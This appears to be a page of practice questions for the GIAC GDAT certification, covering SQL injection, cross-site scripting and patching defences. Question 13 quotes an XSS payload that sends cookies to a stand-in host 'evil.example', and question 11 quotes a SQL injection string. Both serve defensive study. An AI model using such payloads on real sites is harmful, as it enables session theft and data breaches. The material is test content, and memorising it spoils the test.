
GIAC Defending Advanced Threats
Domain 1Objective 3
Application Exploitation GDAT Practice Questions (Page 3)
Part of the Initial Access and Execution domain, which makes up ~29% of our current practice bank. GIAC (SANS) does not publish an official question count, but from its 120-minute exam (~50–80 total, ~15–23 in this domain), expect 5–8 from this objective — we provide 44 practice questions to prepare you well beyond it. (estimate)
44questions here
9free pages
4concepts
Questions 11–15
- 11
A company's public-facing web application allows users to search a product catalog. A security analyst notices that the application logs contain repeated requests with a `category` parameter containing `' OR '1'='1`. The analyst confirms that the application is vulnerable to SQL injection. Which of the following is the most effective first step to mitigate this vulnerability?
Select an answer first - 12
A security team is implementing controls to prevent exploitation of a web application. They want to ensure that even if an attacker finds a vulnerability, they cannot easily execute arbitrary code on the server. Which control would be MOST effective in raising the bar for code execution?
Select an answer first - 13
A developer is writing a web application that displays user comments on a public page. The application currently inserts the comment text directly into the HTML without any encoding. A user submits the following comment: <script>fetch('https://evil.example/steal?cookie='+document.cookie)</script>. What is the MOST effective way to prevent this from executing in other users' browsers?
Select an answer first - 14
Which vulnerability class is characterized by an application failing to properly validate user-supplied input before it is used in a database query, potentially allowing an attacker to manipulate the query?
Select an answer first - 15
A company has a public-facing web application that was recently exploited via a known vulnerability in a third-party component. The security team wants to prevent similar attacks in the future. Which process would be MOST effective in reducing the risk of exploiting known vulnerabilities?
Select an answer first
Finished these 5 questions?
Review the revealed explanations, or continue through the curriculum.
Free Basic Practice is a study aid with revealable answers — not a scored exam. Examers.io is independent and not affiliated with or endorsed by GIAC (SANS). “GDAT” is a trademark of its owner, used for identification only.